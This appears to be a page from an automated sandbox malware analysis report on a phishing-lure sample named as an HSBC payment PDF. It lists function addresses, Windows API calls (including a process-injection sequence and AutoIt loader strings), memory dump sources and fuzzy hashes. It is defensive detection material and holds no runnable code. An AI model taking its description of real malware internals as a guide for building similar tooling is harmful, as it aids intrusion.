Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD

Function 004255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042562C
__lock_file.LIBCMT ref: 0042564D

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59

Function 0099AAC9 Relevance: 3.0, APIs: 2, Instructions: 37fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,0000004C,?,00000000), ref: 0099ACDE
SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 0099AD99

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 6ab1e16260d4d8cf1b8b60ffbb3e763cb61fffb6241b25ce79217d4f5934129d
Instruction ID: d703baedc56db01f2b62703710e0ce27ac360807c3de0141b8c8505b818eba06
Opcode Fuzzy Hash: 6ab1e16260d4d8cf1b8b60ffbb3e763cb61fffb6241b25ce79217d4f5934129d
Instruction Fuzzy Hash: 24F0243024D240BFCF69171D8C199663F69EBC2335F984A46E0A58E1E0E9288C00D2D7

Function 009982F4 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997ea9df2b8c6a48cd170e9fdb4e07b3a4c3973547693d32e21821d19b5a5ffe
Instruction ID: 62fded75cf3c30b0a552220604cf29fb8ddda05b5747adadd2cca499052106e6
Opcode Fuzzy Hash: 997ea9df2b8c6a48cd170e9fdb4e07b3a4c3973547693d32e21821d19b5a5ffe
Instruction Fuzzy Hash: DCF0EC30A88A0096CE761F6EA80C73F3B8C6BB77F5F180A0CDCB0850E2DE009C01410D

Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__lock_file.LIBCMT ref: 004253EB

Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34

__fclose_nolock.LIBCMT ref: 004253F6

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E

Function 0099B108 Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 0099AD99
WriteFile.KERNEL32 ref: 0099B109

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 0fde5928ce07a74fca4e72bef910e269038b7d5a87ecc5ff1b0c12c3276d3c2b
Instruction ID: aa0af62c6ce4fcece7c6f3c6a72fbe44525ce5533611c8fc75e10142d70d0c20
Opcode Fuzzy Hash: 0fde5928ce07a74fca4e72bef910e269038b7d5a87ecc5ff1b0c12c3276d3c2b
Instruction Fuzzy Hash: 70E0D87464C200ABCF205B0D9D4DC3B772DB7C6771F814B0DB262492D4DBBD68009612

Function 00C40215 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00C40A45
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C40A69
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C40A8B

Memory Dump Source

Source File: 00000001.00000002.1386641786.0000000000C3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c3e000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction ID: 0b0ac31fc92a1e9bc490e79a7f56f88ecfb15af98df29269de89ccaedc7b03b4
Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction Fuzzy Hash: A612CD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4F85CB5A

Function 00999B88 Relevance: 1.7, APIs: 1, Instructions: 236COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00999EB5

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8dce591feaf738ae76014f7783860c383effc05ec9fd4d47516be11c2b763f81
Instruction ID: 7e7881abf353cf35670c6813f19d32da1efee8400868176a568f54182beff45b
Opcode Fuzzy Hash: 8dce591feaf738ae76014f7783860c383effc05ec9fd4d47516be11c2b763f81
Instruction Fuzzy Hash: 0E81972150D3809FDF368B6C88597377FE89BA7364F4C498EE0958A1E2D6699C08C763

Function 00999E10 Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb7d13d4754af344cef805b667ab3f772e764f7cdf8a257ac06b999c1b4bcaa8
Instruction ID: f323a40b66c98206bd8727a24a3f130dc6e4397ca15484d7e8983a7e0d2c3afd
Opcode Fuzzy Hash: fb7d13d4754af344cef805b667ab3f772e764f7cdf8a257ac06b999c1b4bcaa8
Instruction Fuzzy Hash: F551C72050C3809ADF358B2C985577ABFEC9FA2324F4C099EE4D68B1E2D6699D04D393

Function 00420C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 00420CB7

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89

Function 0043FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043FCB7

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A

Function 0099AEAC Relevance: 1.6, APIs: 1, Instructions: 84fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0099979E

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7add8f88f5a151df2add98fb24714112ff0360f11bbd7692a4dc6a9d45eb5165
Instruction ID: 5a67ab5e083507077668250c508b01cd242d1485d3660ce6349fc6786445c599
Opcode Fuzzy Hash: 7add8f88f5a151df2add98fb24714112ff0360f11bbd7692a4dc6a9d45eb5165
Instruction Fuzzy Hash: A721711054D3819EDF26866C881973A7FAC9B62364F1D858DF0D48A1E2C27A8C49D3D3

Function 00407B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407BB3

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E

Function 0040784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407899

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
Opcode Fuzzy Hash: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799

Function 0099AEFF Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099AF0F

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8025dec581ed7c95eb245e53795c99464171d9516e25f180607fe3105e498d29
Instruction ID: 205f6fc377db58afe0bfb7d2b1ae075e4562683ccc7ab8f7d08cffa3a137294d
Opcode Fuzzy Hash: 8025dec581ed7c95eb245e53795c99464171d9516e25f180607fe3105e498d29
Instruction Fuzzy Hash: 5B1103749083009BCF21DEBC845533BBBE8EBE6765F98455EE899861A1E7788C04C7C3

Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF

Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4

Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99

Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0043FD91

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B

Function 0099AE0D Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0099AE0E

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d74dd608a0e0c70a9800d4c61d875ba19a57b9a5cb4142d5821f5b933875f141
Instruction ID: 1993f409dd3d757c59a3509dfe97fae4e05e4c403a7b935f01b22d9701922901
Opcode Fuzzy Hash: d74dd608a0e0c70a9800d4c61d875ba19a57b9a5cb4142d5821f5b933875f141
Instruction Fuzzy Hash: 9A21CC6141D3C0AEDB13876C841871BBFE49BA6715F49889EE0D98B6D2D2798C08D7E3

Function 00999BC2 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 0099A190

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c6cc2e1a33615d60981467aa7e09a792f6282a6965e9c15cfdb83044e66b7b4a
Instruction ID: 0d5414dbc76466b8e709d523e7fb6c556b50713e960b0d097b5c06b214dd56d7
Opcode Fuzzy Hash: c6cc2e1a33615d60981467aa7e09a792f6282a6965e9c15cfdb83044e66b7b4a
Instruction Fuzzy Hash: 1711BC2050D3809EDF258B2CC81437A7FE89BA2314F08C54EE4D54B2E2D1799D58C793

Function 0045F73D Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0045F778

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 03ed6151d7788ec2372c79656bc86721a7c16d89d9074e06b8773f19732835ed
Instruction ID: 6643a012d8298439b22d54e31af9e91256dd08be36e54625c764792aa61396f2
Opcode Fuzzy Hash: 03ed6151d7788ec2372c79656bc86721a7c16d89d9074e06b8773f19732835ed
Instruction Fuzzy Hash: 9201D6362002256BCB14DF2DD88196BB7E9EF89354714443EE90ACB206E631E9058791

Function 0099BB7B Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 0099B770

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a0f204b43a52bace972ffec2345627790663bedbae5d2950d681ad24816edfe4
Instruction ID: e63a4db63cd85d269a09686f6c86472eac7a0cedf1bb214fe29ec573610b6820
Opcode Fuzzy Hash: a0f204b43a52bace972ffec2345627790663bedbae5d2950d681ad24816edfe4
Instruction Fuzzy Hash: 2E01FB5180D3C58FCF275A6CBA682357FAC1EA7764F1946CBD4818A4E3D71C4D48C362

Function 00999BD3 Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 0099A190

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b9e35c9028316445e6ae3e6e3b80c177728eb7d8e23b0c65b15d332794de2d8f
Instruction ID: bbac58f8af1f56e16173f12d7b3a24a020b1d7f18d910ede54012b0694ea4ede
Opcode Fuzzy Hash: b9e35c9028316445e6ae3e6e3b80c177728eb7d8e23b0c65b15d332794de2d8f
Instruction Fuzzy Hash: BA01316194D3805EDF268B3C981936A7FAC9B62314F49868ED0E58B1F2E1754E48C3A7

Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 004248A6

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D

Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

